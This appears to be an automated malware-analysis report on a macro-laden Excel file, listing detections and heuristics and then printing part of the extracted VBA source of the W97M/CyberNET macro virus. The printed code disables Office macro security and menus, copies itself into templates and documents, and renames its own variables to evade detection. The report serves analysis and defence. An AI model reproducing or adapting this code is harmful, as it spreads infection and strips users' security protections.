MALICIOUS
Risk Score: 400
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1082 System Information Discovery
T1204.002 Malicious File
This Excel file contains VBA macros, including Workbook_Open and Document_Open, which are designed to execute automatically. The macros utilize Shell() and CreateObject calls, indicating an intent to run arbitrary code and likely download a secondary payload. The presence of ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cybernet-1' further confirms its malicious nature.
Heuristics 8
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13618 bytes |

SHA-256: a6fe075211cde3504cd3d62f713a0f269b92422fb033a02c7a45bc8d395ab6dc
Detection: ClamAV: Doc.Trojan.Cybernet-1
Obfuscation or payload: unlikely

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
'W97M/CyberNET (C)2000 - Indonesia By AnomOke! "I'm NOT Responsible For Any Damage That Posible Cause By My Virus...!!!"
Application.EnableCancelKey = wdCancelDisabled: Options.SaveInterval = 1: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Application.DisplayRecentFiles = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else: Options.VirusProtection _
= False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: End If
Call HH9466
If Day(Now) = 17 And Month(Now) = 8 Or Day(Now) = 25 And Month(Now) = 12 Then
Randomize: For HK184 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next HK184
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName: Call VC6648: End If
MN5776 = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
RQ8515 = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
If ActiveDocument.VBProject.Description <> "CyberNET" Or Left(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = ActiveDocument.VBProject.VBComponents
Call NV6680(BR4082)
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, RQ8515 - 19))
ActiveDocument.VBProject.Description = "CyberNET"
End If
If NormalTemplate.VBProject.Description <> "CyberNET" Or Left(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = NormalTemplate.VBProject.VBComponents
Call NV6680(BR4082)
Randomize
Dim UR50(1 To 37) As String
UR50(1) = "RP6236"
UR50(2) = "JI3255"
UR50(3) = "FR3570"
UR50(4) = "HH8039"
UR50(5) = "JT9846"
UR50(6) = "MN5776"
UR50(7) = "RQ8515"
UR50(8) = "BR4082"
UR50(9) = "JT8173"
UR50(10) = "LK8445"
UR50(11) = "EE7111"
UR50(12) = "NU6972"
UR50(13) = "HH9466"
UR50(14) = "RK5344"
UR50(15) = "AJ8871"
UR50(16) = "MU2056"
UR50(17) = "QH442"
UR50(18) = "CH2979"
UR50(19) = "AD5532"
UR50(20) = "QF692"
UR50(21) = "NV6680"
UR50(22) = "KE184"
UR50(23) = "GC2158"
UR50(24) = "HK184"
UR50(25) = "CR1726"
UR50(26) = "BG8413"
UR50(27) = "CK5437"
UR50(28) = "NL9381"
UR50(29) = "OL8190"
UR50(30) = "KD1649"
UR50(31) = "BM5181"
UR50(32) = "GN4877"
UR50(33) = "VC6648"
UR50(34) = "IM6298"
UR50(35) = "UV3228"
UR50(36) = "DC5962"
UR50(37) = _
"UR50"
For NU6972 = 1 To 37
JT8173 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JT9846(JT8173, UR50(NU6972))
Next NU6972
ActiveDocument.Saved = True
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, MN5776 - 1) & _
vbCr & "Sub ViewVBCode()" & vbCr & "CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Enabled = False" & vbCr & "End Sub" & vbCr & "Sub ToolsMacro()" _
& vbCr & "Call ViewVBCode" & vbCr & "End Sub" & vbCr & "Sub FileOpen()" & vbCr & "WordBasic.DisableAutoMacros True" & vbCr & "On Error Resume Next" & vbCr & _
"If Dialogs(80).Show <> 0 Then Call Document_Close" & vbCr & "WordBasic.DisableAutoMacros False" & vb
... (truncated)